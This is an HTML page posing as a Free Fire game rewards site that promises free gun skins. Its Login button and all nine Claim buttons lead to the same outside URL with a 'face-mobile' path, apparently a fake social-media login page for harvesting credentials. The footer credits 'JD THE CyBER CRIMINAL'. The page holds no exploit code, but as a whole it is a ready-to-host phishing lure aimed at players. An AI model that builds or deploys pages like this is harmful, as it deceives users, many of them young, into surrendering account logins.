<!DOCTYPE html>
<html lang="en">
<head>
    <meta content='width=device-width, initial-scale=0.3' name='viewport'/>
    <meta charset="UTF-8">
    <title>Free Fire Rewards</title>
    <style type="text/css">
        .body{
    height: 2000px;
    width: 100%;
    padding: 0px 30px;
    background: black;
    
}

.header{
    height: 100px;
    width: 100%;
}

.logo{
    height: 80px;
}

.login{
    float: right;
}
.login h1 a{
    color: white;
    font-weight: bold;
    font-size: 60px;
    text-decoration: none;
    
}


/* banner */
.banner{
    height: 600px;
    width: 100%;
    border: 5px solid #ffa815;
    border-radius: 20px;
            
    margin: auto;
}

.banner video{
    height: 590px;
    width: 100%;
}




/* second menu bar */
.menu-bar{
    height: 100px;
    width: 100%;
    border: 5px solid #ffa815;
    border-radius: 10px;
    background-image: url('image/menu.png');
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    text-transform: uppercase;
    font-family: Consolas, Courier, monospace;
    font-size: 50px;
    font-weight: bold;
    text-align: center;
    line-height: 110px;
    color: #ffa815;
    text-shadow: 5px 5px 5px black;
}



/* Claim item shop started */
.box{
    height: 590px;
    width: 100%;
    border: 5px solid #ffa815;
    background: #83838348;
}

.box-div{
    height: 430px;
    width: 100%;
    margin: 20px;
    margin-bottom: 0px;
}

.box-div nav{
    height: 430px;
    width: 30%;
    margin-right: 9px;
    margin-left: 9px;
    display: inline-block;
    border: 5px solid #ffa815;
    border-bottom: none;
}
.claim-image{
    height: 430px;
    width: 100%;
}


/* claim btn started */

.claim{
    height: 100px;
    width: 100%;
    margin: 20px;
    margin-top: 0px;
}

.claim nav{
    height: 100px;
    width: 30%;
    margin-right: 9px;
    margin-left: 9px;
    display: inline-block;
    border: 5px solid #ffa815;
    background-image: url('image/claim.jpg');
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    text-align: center;
    line-height: 110px;
}

.claim nav a{
    text-decoration: none;
    font-family: Consolas, Courier, monospace;
    color: #ffa815;
    font-weight: bold;
    font-size: 70px;
    padding: 10px 50px;
    text-shadow: 5px 5px 5px black;
    text-transform: uppercase;
    
}


.footer{
    height: 150px;
    width: 100%;
    background: black;
    color: white;
    font-weight: bold;
    font-size: 30px;
    font-family: Consolas, Courier, monospace;
    text-align: center;
    line-height: 170px;
}

    </style>
</head>
<body class="body">
    
    
    <!-- Header -->
    <header class="header">
        <img src="image/logo.jpg" alt="Free Fire Logo" title="Free Fire" class="logo">
        <div class="login">
            <h1><a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Login</a></h1>
        </div>
    </header>
    
    
    <!-- banner -->
    <div class="banner">
        <video src="video/banner-video.mp4" autoplay loop muted>Free Fire</video>
    </div>
    <br><br><br>
    
    
    
    
    <!-- Second menu bar -->
    <div class="menu-bar">
        Join and get exclusive rewards now
    </div><br><br>
    <!-- second menu bar completed -->
    
    
    
    
    <!-- Claim Item shop started -->
    <div class="box">
        <div class="box-div">
            <nav><img src="image/1.jpg" class="claim-image" alt="Gun skin"></nav>
            <nav><img src="image/2.jpg" class="claim-image" alt="Gun skin"></nav>
            <nav><img src="image/3.jpg" class="claim-image" alt="Gun skin"></nav>
        </div>
        <!-- line breaks & claim started -->
        <div class="claim">
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
            
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
            
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
        </div>
    </div><br>
    
    <!-- second -->
    <div class="box">
        <div class="box-div">
            <nav><img src="image/4.jpg" class="claim-image" alt="Gun skin"></nav>
            <nav><img src="image/5.jpg" class="claim-image" alt="Gun skin"></nav>
            <nav><img src="image/6.jpg" class="claim-image" alt="Gun skin"></nav>
        </div>
        <!-- line breaks & claim started -->
        <div class="claim">
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
            
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
            
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
        </div>
    </div><br>
    
    
    <!-- Third -->
    <div class="box">
        <div class="box-div">
            <nav><img src="image/7.jpg" class="claim-image" alt="Gun skin"></nav>
            <nav><img src="image/8.jpg" class="claim-image" alt="Gun skin"></nav>
            <nav><img src="image/9.jpg" class="claim-image" alt="Gun skin"></nav>
        </div>
        <!-- line breaks & claim started -->
        <div class="claim">
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
            
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
            
            <nav>
                <a href="http://prosite2.com.global.prod.fastly.net/all/apps/face-mobile/?i=90639">Claim</a>
            </nav>
        </div>
    </div>
    
    
    
    
    <footer class="footer">
        copyright &copy 2023 <a href="https://instagram.com/jd_the_cyber_criminal_" style="text-decoration: none;">JD THE CyBER CRIMINAL</a>. All Right Reserve
    </footer>
    
</body>
</html>
